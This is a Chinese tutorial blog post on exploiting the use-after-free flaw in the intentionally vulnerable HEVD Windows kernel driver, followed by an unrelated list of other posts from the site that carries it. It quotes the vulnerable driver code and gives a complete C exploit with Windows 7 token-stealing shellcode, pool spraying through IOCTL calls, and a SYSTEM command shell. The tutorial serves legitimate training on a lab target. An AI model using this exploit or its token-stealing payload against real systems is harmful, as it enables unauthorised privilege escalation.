pipixia233333
pipixia233333

Windows内核(HEVD) 之UAF

UAF这个词 确实不算陌生

不过要说的一点是 在CTF里面的应用一般是 堆块在释放的时候  堆块指针没有清空 然后 再次申请 申请到那块的区域 然后就可以通过一开始的堆块指针来写 就达到了 修改的目的

然后 在这个样例里面来说 并不是堆块 算是内存池===  这个概念还是不太了解 等到扒扒我的书

然后可以先看这个样例的代码   可以看到 有几个重要函数

AllocateUaFObjectNonPagedPool 

这个函数就是 申请一个自己定义的 结构体大小的 内存

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *	PUSE_AFTER_FREE_NON_PAGED_POOL;

然后 把这个申请到的地方给了 全部变量 也就是  g_UseAfterFreeObjectNonPagedPool 这个变量 其中我们可以看到这个结构体 有一个函数指针   并且 在 UseUaFObjectNonPagedPool 这个函数里面调用到了

我们看一下调用函数的情况

if (g_UseAfterFreeObjectNonPagedPool)
        {
            DbgPrint("[+] Using UaF Object\n");
            DbgPrint("[+] g_UseAfterFreeObjectNonPagedPool: 0x%p\n", g_UseAfterFreeObjectNonPagedPool);
            DbgPrint("[+] g_UseAfterFreeObjectNonPagedPool->Callback: 0x%p\n", g_UseAfterFreeObjectNonPagedPool->Callback);
            DbgPrint("[+] Calling Callback\n");

            if (g_UseAfterFreeObjectNonPagedPool->Callback)
            {
                g_UseAfterFreeObjectNonPagedPool->Callback();
            }

            Status = STATUS_SUCCESS;
        }

这里判断了  全部变量是否为空 然后判断了  函数的指针是否为空 然后就直接执行这个函数

然后继续往下看

FreeUaFObjectNonPagedPool  这个可以看到是一个free 函数

       if (g_UseAfterFreeObjectNonPagedPool)
        {
            DbgPrint("[+] Freeing UaF Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", g_UseAfterFreeObjectNonPagedPool);

#ifdef SECURE
            //
            // Secure Note: This is secure because the developer is setting
            // 'g_UseAfterFreeObjectNonPagedPool' to NULL once the Pool chunk is being freed
            //

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

            //
            // Set to NULL to avoid dangling pointer
            //

            g_UseAfterFreeObjectNonPagedPool = NULL;
#else
            //
            // Vulnerability Note: This is a vanilla Use After Free vulnerability
            // because the developer is not setting 'g_UseAfterFreeObjectNonPagedPool' to NULL.
            // Hence, g_UseAfterFreeObjectNonPagedPool still holds the reference to stale pointer
            // (dangling pointer)
            //

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

这里可以看到有  安全的版本就是 将全局指针清空    危险的版本就是我们的UAF了 ==

然后下面看一下 AllocateFakeObjectNonPagedPool

这个算是 给了一个利用函数吧 

这个是  申请一个  PFAKE_OBJECT_NON_PAGED_POOL 结构体 然后把我们用户的缓冲区给复制进来 ==

这里为了  利用方便 把这里个结构的大小定义成一样的

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *	PUSE_AFTER_FREE_NON_PAGED_POOL;

typedef struct _FAKE_OBJECT_NON_PAGED_POOL
{
    CHAR Buffer[0x58];
} FAKE_OBJECT_NON_PAGED_POOL, *PFAKE_OBJECT_NON_PAGED_POOL;

 

到这里 我们基本就整理清楚了 

利用思路也可以大致梳理一下   大概就是

先申请一个use  然后  free  然后申请一个 fakeuse  然后 使用callback 就可以了

不过 这Windows 内核里面 却是需要注意几点===

第一点就是找到一个 找到一个 差不多大的 对象类型 可以申请 然后进行喷射 

第二点就是 每两个来释放内存 防止堆块合并  堆块在一起 会自动合并

第三点就是 多申请几次 可能会有其它碎片化 的堆块 导致了我们申请的空间达不到全局指针指向的内存

可以看一下这个链接https://bbs.pediy.com/thread-225181.htm

关于这个对象的介绍

Windows内核(HEVD) 之UAF_第1张图片

然后我们就可以写出exp了

这里 是用的下面的exp写的 感觉 这里更简洁一点

#include
#include
#include
#include
#include
#include
#include "windows.h"
using namespace std;
typedef void(*FunctionPointer) ();
typedef struct _FAKE_USE_AFTER_FREE
{
	FunctionPointer callback;
	char buffer[0x54];
}FAKE_USE_AFTER_FREE, *PUSE_AFTER_FREE;

VOID TokenStealingPayloadWin7Generic() {
	// No Need of Kernel Recovery as we are not corrupting anything
	__asm {
		pushad; Save registers state

			; Start of Token Stealing Stub
			xor eax, eax; Set ZERO
			mov eax, fs:[eax + 0x124]; Get nt!_KPCR.PcrbData.CurrentThread
			; _KTHREAD is located at FS : [0x124]

			mov eax, [eax + 0x50]; Get nt!_KTHREAD.ApcState.Process

			mov ecx, eax; Copy current process _EPROCESS structure

			mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4

		SearchSystemPID:
		mov eax, [eax + 0xb8]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, 0xb8
			cmp[eax + 0xb4], edx; Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

			mov edx, [eax + 0xf8]; Get SYSTEM process nt!_EPROCESS.Token
			mov[ecx + 0xf8], edx; Replace target process nt!_EPROCESS.Token
			; with SYSTEM process nt!_EPROCESS.Token
			; End of Token Stealing Stub

			popad; Restore registers state
	}
}

static VOID Cmd()
{
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}


int main()
{
	DWORD recv;
	// 获取句柄
	HANDLE hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		NULL,
		NULL,
		OPEN_EXISTING,
		NULL,
		NULL);

	if (hDevice==INVALID_HANDLE_VALUE||hDevice==NULL)
	{
		printf("打开句柄失败===\n");
		return 0; 
	}
	
	DeviceIoControl(
		hDevice,
		0x222013,
		NULL,
		NULL,
		NULL,
		0,
		&recv,
		NULL);
	//申请内存块
	DeviceIoControl(hDevice, 
		0x22201B, 
		NULL, 
		NULL,
		NULL, 
		0,
		&recv, 
		NULL);
	//free内存块
	PUSE_AFTER_FREE UseAfterFree = (PUSE_AFTER_FREE)malloc(sizeof(FAKE_USE_AFTER_FREE));
	UseAfterFree->callback = TokenStealingPayloadWin7Generic;
	RtlFillMemory(UseAfterFree->buffer, sizeof(UseAfterFree->buffer), 'A');
	for (int i = 0; i < 5000; i++)
	{
		//申请 fake内存块
		DeviceIoControl(hDevice, 0x22201F, UseAfterFree, 0x60, NULL, 0, &recv, NULL);
	}
	//执行shellcode
	DeviceIoControl(hDevice, 0x222017, NULL, NULL, NULL, 0, &recv, NULL);
	Cmd();
	return 0;
}

Windows内核(HEVD) 之UAF_第2张图片

参考链接

https://bbs.pediy.com/thread-225181.htm

https://github.com/ThunderJie/Windows-Kernel-Exploit/blob/master/HEVD/UAF/UAF/test1.c

你可能感兴趣的:(栈溢出,堆溢出)

  • 安恒杯2018-pwn-over Sadmess
    framefaking正如这个技巧名字所说的那样,这个技巧就是构造一个虚假的栈帧来控制程序的执行流。原理概括地讲,我们在之前讲的栈溢出不外乎两种方式控制程序EIP控制程序EBP其最终都是控制程序的执行流。在framefaking中,我们所利用的技巧便是同时控制EBP与EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。一般来说其payload如下bufferpadding|fakeebp
  • 【LeetCode+JavaGuide打卡】Day14|144.二叉树的前序遍历、145.二叉树的后序遍历、94.二叉树的中序遍历 WhoAmI\ leetcode算法职场和发展
    学习目标:144.二叉树的前序遍历145.二叉树的后序遍历94.二叉树的中序遍历学习内容:递归遍历文章讲解确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保
  • 父子树形结构(Stream+Lambda) A尘埃 树形结构StreamLambda
    两个类似的需求:返回组装好的部门树、返回组装好的地区信息树,最终都需要返回List集合对象给前端。一般来说完成这样的需求大多数人会想到递归,但递归的方式弊端过于明显:方法多次自调用效率很低、数据量大容易导致堆栈溢出、随着树深度的增加其时间复杂度会呈指数级增加等。一次数据库查询全部数据(几万条),其它全是内存操作、性能高;同时熟练使用stream流操作、Lambda表达式、Java地址引用,完成组装
  • QWB-2018-core | 栈溢出 goodcat666 pwn_cve_kernellinuxpwn
    题目分析core_writesigned__int64__fastcallcore_write(__int64a1,__int64a2,unsigned__int64a3){unsigned__int64v3;//rbxv3=a3;printk(&unk_215);if(v363){printk(&unk_2A1);result=0xFFFFFFFFLL;}else{result=0LL;qmem
  • 嵌入式软件工程师面试题(八) 嵌入式基地 牛客网嵌入式刷题专栏面试嵌入式面试面试题单片机can
    ✅作者简介:大家好我是:嵌入式基地,是一名嵌入式工程师,希望一起努力,一起进步!个人主页:嵌入式基地系列专栏:嵌入式习题专栏微信公众号:嵌入式基地嵌入式软件工程师面试题(八)1、在FreeRTOS中,任务通知的运行机制是怎么样的?2、什么情况下会栈溢出?如何避免?3、深复制和浅复制的区别?4、从一个源文件到可执行文件的过程?5、简述一下快速排序的步骤6、头文件的两种包含方式的区别,与""区别点击查
  • pwn学习笔记(3)ret2syscall 晓幂 学习笔记
    pwn学习笔记(3)ROP原理:ROP(ReturnOrientedProgramming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。栈溢出–ret2syscall:1.系统调用:对于一个已经存在于标准库中的函数,例如printf(),我们编写某个程序的时候,这个函数仅仅只用了printf(参数);这么一行,但是,其工作
  • ndk-stack使用及符号表还原 神迹12
    在android开发中,对于native产生的异常,很可能会产生闪退。对于ndk和native(c、c++)开发中,指针和内存管理是最重要也是最容易出问题的地方,稍有不慎就会遇到诸如内存地址访问错误、野针对、内存泄露、堆栈溢出、初始化错误、类型转换错误、数字除0等常见的问题。AndroidNDK安装包中提供了三个调试工具:addr2line、objdump和ndk-stack可用于native异常
  • 复习leetcode第二百三十一题:2的幂(C语言) 一个不知名程序员www leetcode
    注:本题不是必须使用递归的方法来求解的,同时,2的幂也可以用pow函数来代替;但笔者在此讲解会是在不用pow函数情况下,使用递归的方式本题使用递归时,首先考虑的是如何实现2的幂数,笔者在这边又再题目给的函数基础上,又自定义了一个长整型函数mi(这边的返回类型必须是longint,否则使用递归以后会由于返回值超过int字节大小的范围,出现栈溢出),然后在该函数中实现与pow函数相同功能的函数。lon
  • 代码随想录算法训练营第十四天|二叉树的递归遍历、二叉树的迭代遍历 前端花卷 代码随想录算法训练营算法数据结构javascript
    二叉树的理论基础参考资料(代码随想录)二叉树的递归遍历参考资料(代码随想录)思路递归算法的三个要素:确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保存每一
  • vue导航前置守卫 ZOE^V1 vue
    堆栈溢出不知道为什么routers.beforeEach(async(to,from,next)=>{console.log('to',to)console.log('from',from)console.log('next',next)varuserinfo=store.state.user.userinfoconsole.log(userinfo.name)//----------------
  • golang信号处理 realPeanut
    信号是IPC之一,下面是常用的信号列表信号值动作说明SIGHUP1Term终端控制进程结束(终端连接断开)SIGINT2Term用户发送INTR字符(Ctrl+C)触发SIGQUIT3Core用户发送QUIT字符(Ctrl+/)触发SIGILL4Core非法指令(程序错误、试图执行数据段、栈溢出等)SIGABRT6Core调用abort函数触发SIGFPE8Core算术运行错误(浮点运算错误、除数
  • C语言一招教你搞定所有基础函数知识(中) 小陈从不会敲代码 C语言初阶c语言开发语言
    9.函数递归9.1递归的定义递归是什么?递就是递推,回就是回归,递推到结束,回归到开始,说白了就是函数自己调用自己,开始到结束调用,结束到开始调用。#includeintmain(){printf("hehe\n");main();//main函数中⼜调⽤了main函数return0;}这个代码只是为了演示递归的基本形式,不是为了解决问题,最终会栈溢出。9.2如何进行递归递归的时候就是把一个大问题
  • ARM PAC/BTI/MTE三剑客精讲与实战 安全二次方 博客目录导读ARM安全架构PAC指针认证BTI分支目标识别MTE内存标记扩展
    一、PAC指针认证精讲与实战思考1、什么是栈溢出攻击?什么是代码重用攻击?区别与联系?2、栈溢出攻击的软&硬件缓解技术有哪些?在TF-A&OPTEE上的应用?3、什么是ROP攻击?对ROP攻击的缓解技术?4、PAC下的ROP如何缓解?对返回地址的签名与验证?5、PAC的架构细节?硬件原理?PAC如何生成?如何检查?指令集?6、PAC如何启用?构建PAC的编译选项控制?7、PAC功能如何验证?PAC
  • C语言:函数递归 靡樊 c语言学习
    1.递归是什么?先来看最简单的递归代码:#includeintmain(){printf("HelloWorld\n");main();return0;}在main函数里还有一个main函数,在XXX函数里有XXX函数,这种就是递归在函数里调用自己,但这种情况会无限打印HelloWorld,最后导致栈溢出递归的递就是递推的意思,归就是回归的意思,上面的代码则是一直在递,没有归,所以导致栈溢出,所以
  • zer0pts-2020-memo:由文件偏移处理不正确--引发的堆溢出 goodcat666 pwn_cve_kernellinuxpwn
    启动脚本#!/bin/shqemu-system-x86_64\-m256M\-kernel./bzImage\-initrd./rootfs.cpio\-append"root=/dev/ramrwconsole=ttyS0oops=panicpanic=1kaslrquiet"\-cpukvm64,+smep,+smap\-monitor/dev/null\-nographic-enable-
  • “手把手教你玩转函数递归,建议收藏!“ 日月明之月 算法c语言c++开发语言
    目录1.什么是递归2.递归的限制条件3.递归的举例4.递归与迭代正⽂开始1.递归是什么?递归是学习C语⾔函数绕不开的⼀个话题,那什么是递归呢?递归其实是⼀种解决问题的⽅法,在C语⾔中,递归就是函数⾃⼰调⽤⾃⼰。写⼀个史上最简单的C语⾔递归代码:上述就是⼀个简单的递归程序,只不过上⾯的递归只是为了演⽰递归的基本形式,不是为了解决问题,代码最终也会陷⼊死递归(死循环),导致栈溢出。递归的思想:把⼀个⼤
  • C语言----函数递归(自我总结) Phospherus. c语言c++
    一.什么是递归?递归是学习C语⾔函数绕不开的⼀个话题!函数的递归:递归其实是⼀种解决问题的方法。在C语⾔中,递归就是函数自己调用自己。举例:写一个史上最简单函数递归的代码:此代码的运行结果如下:以上代码就是⼀个简单的递归程序,只不过上述代码不是为了解决问题,而是为了演示递归的基本形式,代码陷⼊了递归死循环,最终导致栈溢出(Stackoverflow)。递归的思想:把⼀个⼤型复杂问题层层转化为⼀个与
  • ESXi 勒索病毒ESXiArgs 其 CVE-2021-21974 漏洞分析 Songxwn VMware网络安全服务器
    个人博客https://songxwn.com介绍该漏洞编号为CVE-2021-21974,由OpenSLP服务中的堆溢出问题引起,未经身份验证的攻击者可以此进行低复杂度攻击。该漏洞主要影响6.x版和6.7、7.0版本之前的ESXi管理程序,2021年2月23日,VMware曾发布补丁修复了该漏洞。(在此之后发布的版本不影响)该漏洞启动之后,主要破坏行为为停止所有虚拟机,并加密所有数据文件。具体影
  • JS汉诺塔 AwyaW1217 vue.js前端javascript
    函数直接或间接调用自身避免无限递归,无限递归会导致执行栈溢出对比死循环,不会导致栈溢出执行栈任何代码的执行都必须有一个执行环境,执行环境为代码的执行提供支持执行环境是放到执行栈中的每个函数的调用,都需要创建一个函数的执行环境,函数调用结束,执行环境销毁执行栈有相对谷固定的大小,如果执行环境太多,执行栈无法容纳,栈溢出会报错尾递归如果一个函数最后一条语句是调用函数,并且调用函数不是表达式的一部分,则
  • 寒假作业:2024/2/2 FS223107 javajvm开发语言
    作业1:堆栈的区别栈区:1.栈区是根据栈的思想实现的,先进后出,先申请的变量后分配内存,所以地址是从大地址到小地址2.栈区内存是由计算机自动申请和释放的3.栈区内存一般在几MB4.栈区内存较小,容易造成堆栈溢出:表示内存不足,例如当递归较深时,计算机会一直分配内存,导致栈区内存不足,造成堆栈溢出5.栈区内存申请比较连续堆区:1.堆区是根据队列的思想实现的,先进先出,先申请的变量先分配内存,所以地址
  • CTF比赛 二进制 PWN方入门:基础知识点精讲 徐小潜 学习学习方法经验分享安全网络安全笔记系统安全
    目录二进制基础hack可执行文件小端序两种汇编格式栈溢出基础函数调用栈栈的结构相关寄存器函数调用栈缓冲区溢出PWN工具软件工具Python库Linux系统工具相关值利用PWN步骤以ret2text(32位)为例觉得这篇文章不错的话,欢迎收藏、点赞、评论,期待你的关注!Reverse入门博客推荐:CTF比赛Reverse逆向方向:入门规划精讲-CSDN博客PWN入门学习视频推荐:XMCVECTFPw
  • 20、数据结构相关练习20210202 Dai_yahong 数据结构开发语言
    一、请简述栈区和堆区的区别。1.栈区借助于栈的思想实现,“先进后出”,地址申请从大地址到小地址;堆区借助队列思想实现,“先进先出”,地址申请从小地址到大地址;2.栈区的内存由计算机自动申请自动释放,堆区由程序员手动申请(malloc)手动释放(free);3.栈区大小一般在几M,堆区一般在几G;4.由于栈区较小,可能会出现溢出情况(堆栈溢出),如递归调用较深时,计算机会不断在栈区申请内存。5.栈区
  • C语言函数递归详解 阿阿越 c语言
    递归是什么?递归,顾名思义,就是递推和回归。递归是一种解决问题的方法,在C语言中,递归就是函数自己调用自己。#includeintmain(){printf("hehe\n");main();//main函数中⼜调⽤了main函数return0;}上面就是C语言最简单的递归代码。但是这种代码最终会陷入死递归,导致栈溢出(Stackoverflow)。递归的核心是思想和限制条件:1、思想:把一个大型
  • C语言:函数递归详解 弓.长. c语言开发语言
    文章目录一、基础概念1.函数递归的概念2.递归函数的定义3.函数递归的优缺点4.函数递归的两个必要条件二、函数递归实例入门(1).最简单的函数递归1.1栈溢出的原因(2).顺序打印整数的每一位三、函数递归举例举例1:求n的阶乘举例2:递归实现n的k次方举例3:计算一个数的每位之和(递归实现)举例4:斐波那契数(递归实现和非递归实现)(1).递归的实现(2).非递归的实现一、基础概念1.函数递归的概
  • 解决C#中无限递归导致的System.StackOverflowException异常 空白_d java算法开发语言笔记c#
    目录背景:错误示例分析:为什么是错误的?正确的使用递归:修改后的代码:原理和原因:结论:背景:在软件开发中,递归是一种常见的编程技术,它允许方法调用自身来解决问题。然而,如果不正确使用,递归可能导致严重的性能问题或运行时错误,如栈溢出。本文将通过分析一个具体的错误示例——一个无限递归调用自身的情况,来探讨递归的正确使用方法及其背后的原理。错误示例分析:考虑下面的C#代码段,这是一个简化的新闻管理系
  • 2.2作业 Yukiii_Y 算法数据结构
    1.堆区和栈区的区别堆区基于队列的思想,先定义的变量先申请内存,大小在几G,属于静态分配需要手动申请手动释放,从小地址到大地址,容易出现片段化栈借助栈的思想,先定义的变量,后分配内存,动态自动申请自动释放,大小在几M,会发生堆栈溢出,内存连续2.#include#include#includetypedefstructlist{intdata;structlist*next;}*Linklist;
  • java.lang.StackoverflowError: null .小白菜. javajvm开发语言
    首先,这个问题呢是栈溢出导致的,一般出现原因大多都是因为,无限递归死循环导致的前言:在JVM当中,每个线程都有自己的程序计数器,虚拟机栈和本地方法栈,这个栈溢出是指的是虚拟机栈溢出。再说这个栈溢出的时候,先来看一下我们虚拟机栈的结构一次次的Java方法调用就代表着一个栈帧,秉承着先进后出的原则,每次调用会将栈帧入栈,指令执行完成后进行出栈,然后按照程序的指令不停的入栈出栈,直到程序结束,但是死循环
  • 查询报错:java.lang.StackOverflowError: null PI_PIBOY Hibernate
    java.lang.StackOverflowError:null字面理解报错的原因是栈溢出。我这里仅讲由于使用JPA导致的java.lang.StackOverflowError:null例子:清洁工实体@Data@Entity@Table(name="cms_cleaner")publicclassCleanerimplementsSerializable{@ManyToMany(fetch=
  • JPA执行查询报错java.lang.StackOverflowError: null问题排查与解决 MaYuKang 线上问题排查javahibernateJPAJoinProcessordoFindAllNodes
    生产环境执行定时任务时报错java.lang.StackOverflowError:null开发和测试环境运行正常,报错方法为Jpa类库里JoinProcessor.doFindAllNodes方法,该方法用于拼接查询参数,如(?,?,?,?),由于是通过迭代进行拼接,通过jpa提供的findByIdIn方法,传入的id集合,所以当拼接参数过长时,会发生栈溢出异常。可以通过分段查询的方式和更改jv
  • java.lang.StackOverflowError: null(栈内存溢出) 贤云Ye鹤 java开发中遇到的问题javajvmservlet
    StackOverflowError在程序栈空间耗尽时抛出,通常是深度递归导致,出现栈内存溢出,查询了网上的资料,一般来说出现栈溢出的情况有:service层忘了加@Service注解service层忘了加@Autowired注解多个实体类有多对多(多对一)关系时,两个有对应关系的实体类都重写相关联属性字段的toString方法,这样会导致一直递归重写下去,内存当然会被耗尽,导致栈溢出Thymel
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
